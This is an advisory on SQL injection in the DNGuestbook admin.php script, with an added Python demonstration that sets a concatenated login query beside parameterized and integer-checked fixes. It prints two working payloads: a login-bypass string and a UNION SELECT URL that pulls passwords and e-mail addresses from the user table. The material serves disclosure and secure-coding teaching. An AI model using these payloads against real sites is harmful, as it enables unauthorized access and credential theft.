Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities


An exploit is not required.

The following proof-of-concept examples are available:

SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'

http://www.example.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
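The first proof-of-concept shows the characteristic shape of a login query built by string concatenation: the mail value closes the quoted string, appends `OR 1 = 1`, and comments out the password check. The following is an added example (not DNGuestbook's code; the advisory does not publish it) that reproduces that pattern against an in-memory SQLite table and places the parameterized fix beside it. The table and column names (`dnguestbook_user`, `mail`, `passwort`) are taken from the advisory's query; the user rows, the `id` column and the helper names are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for the guestbook's user table.
# Plaintext passwords are used only to mirror the query in the advisory.
SAMPLE_USERS = [("admin@example.com", "s3cret")]

# The advisory's payload as it would arrive in the "mail" form field.
INJECTED_MAIL = "' OR 1 = 1 /* "


def make_db():
    """Create an in-memory database with the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE dnguestbook_user "
        "(id INTEGER PRIMARY KEY, mail TEXT, passwort TEXT)"
    )
    conn.executemany(
        "INSERT INTO dnguestbook_user (mail, passwort) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn, mail, passwort):
    """Concatenates user input into the SQL text (the defect class described)."""
    sql = (
        "SELECT * FROM dnguestbook_user WHERE mail='" + mail
        + "' AND passwort='" + passwort + "'"
    )
    # With INJECTED_MAIL this becomes:
    #   ... WHERE mail='' OR 1 = 1 /* ' AND passwort='b0000m'
    # The unterminated /* comment swallows the password check.
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, mail, passwort):
    """Same check with bound parameters: input is data, never SQL syntax."""
    sql = "SELECT * FROM dnguestbook_user WHERE mail=? AND passwort=?"
    return conn.execute(sql, (mail, passwort)).fetchone() is not None


def fetch_entry_fixed(conn, raw_id):
    """Numeric parameter (the advisory's second vector, gbgo=edit&id=...):
    enforce the type before the value reaches the query, then bind it."""
    try:
        entry_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT id, mail FROM dnguestbook_user WHERE id=?", (entry_id,)
    ).fetchone()


def demo():
    """Run the vulnerable and fixed checks against the same data."""
    conn = make_db()
    return {
        # True: the concatenated query authenticates without a valid password
        "vulnerable_bypassed": login_vulnerable(conn, INJECTED_MAIL, "b0000m"),
        # False: the bound parameter is compared as a literal string
        "fixed_bypassed": login_fixed(conn, INJECTED_MAIL, "b0000m"),
        # True: legitimate credentials still work
        "fixed_valid": login_fixed(conn, "admin@example.com", "s3cret"),
        # None: a non-numeric id is rejected before any SQL runs
        "fixed_bad_id": fetch_entry_fixed(conn, "-999 union select 0"),
        # Row for the constructed user with id 1
        "fixed_good_id": fetch_entry_fixed(conn, "1"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Both fixes are the same idea applied to the two inputs the advisory names: string fields go through bound parameters, numeric fields are converted to an integer first and then bound as well. Binding alone is sufficient to stop the `UNION SELECT` on `id`; the integer check is an additional layer that rejects malformed input early. A real implementation would additionally store password hashes rather than the plaintext `passwort` column the advisory's query reveals.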

Copyright 2010, SecurityFocus